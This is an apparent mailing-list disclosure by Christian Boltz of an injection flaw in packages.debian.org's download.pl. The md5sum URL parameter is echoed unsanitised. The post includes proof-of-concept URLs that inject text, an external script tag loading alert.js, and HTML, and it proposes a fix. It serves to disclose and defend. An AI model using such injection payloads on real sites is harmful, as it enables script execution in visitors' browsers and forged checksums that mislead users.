Hello,
[please CC me in replies, I'm not subscribed]it's easy to do some code injection in packages.debian.org: http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked&arch=i386&type=main Credits go to fefe (http://blog.fefe.de/?ts=bb838974) for finding this. Even better: http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=not%20available%20because%20the%20site%20is%20hacked<script%20src="http://www.cboltz.de/tmp/alert.js";></script>&arch=i386&type=main Or my personal favorite: http://packages.debian.org/cgi-bin/download.pl?arch=i386&file=pool%2Fmain%2Fd%2Fdietlibc%2Fdietlibc_0.28-3_i386.deb&md5sum=d41d8cd98f00b204e9800998ecf8427e<p>Powered%20by%20<img%20src="http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png";>&arch=i386&type=main *SCNR* One could also "just" inject wrong MD5SUMs easily... Proposed solution: Please read the MD5SUM from a file or database instead of an URL parameter ;-) Regards, Christian Boltz -- Fontlinge developer Fontlinge - font management for Linux / Schriftenverwaltung für Linux Infos und Download: http://www.gesindel.de
![http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png"](http://files.opensuse.org/opensuse/en/f/ff/Opensuse-green.png"){kind=link}